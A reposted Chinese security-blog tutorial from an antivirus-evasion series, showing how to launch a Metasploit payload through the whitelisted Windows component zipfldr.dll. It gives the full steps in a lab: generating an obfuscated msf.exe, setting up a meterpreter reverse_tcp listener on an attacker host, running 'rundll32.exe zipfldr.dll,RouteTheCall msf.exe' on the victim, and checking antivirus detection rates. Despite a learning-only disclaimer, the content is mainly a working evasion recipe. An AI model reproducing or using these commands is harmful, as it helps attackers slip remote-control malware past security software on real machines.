远控免杀专题(56)-白名单zipfldr.dll执行payload
2022-7-21 07:57:25 Author: 白帽子(查看原文) 阅读量:10 收藏

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。

说明:zipfldr.dll所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。Windows 2003 默认位置:

C:\Windows\System32\zipfldr.dllC:\Windows\SysWOW64\zipfldr.dll

Windows 7 默认位置:

C:\Windows\System32\zipfldr.dllC:\Windows\SysWOW64\zipfldr.dll

攻击机:10.211.55.10 kali

靶机:10.211.55.18 win7

由AVIator生成msf.exe。具体参考远控免杀专题(14)-AVIator(VT免杀率25/69)

将生成的msf.exe木马移动到靶机上。

metasploit监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 10.211.55.10run

靶机执行

rundll32.exe zipfldr.dll,RouteTheCall msf.exe

360提示恶意命令执行。点击允许后可上线

放在virustotal.com上msf.exe查杀率为19/69

三、参考资料

基于白名单zipfldr.dll执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/90_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95zipfldr.dll%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E5%85%AB%E5%AD%A3.html

E

N

D

guān

zhù

men

Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246191&idx=2&sn=d6a7bf5cba75b83171e2f3a1b6fe40e2&chksm=82ea5786b59dde9037bc88face56343d76ae439dd4c15bda2a0da1d1b1f3be3a58ae3cc986c7#rd
如有侵权请联系:admin#unsafe.sh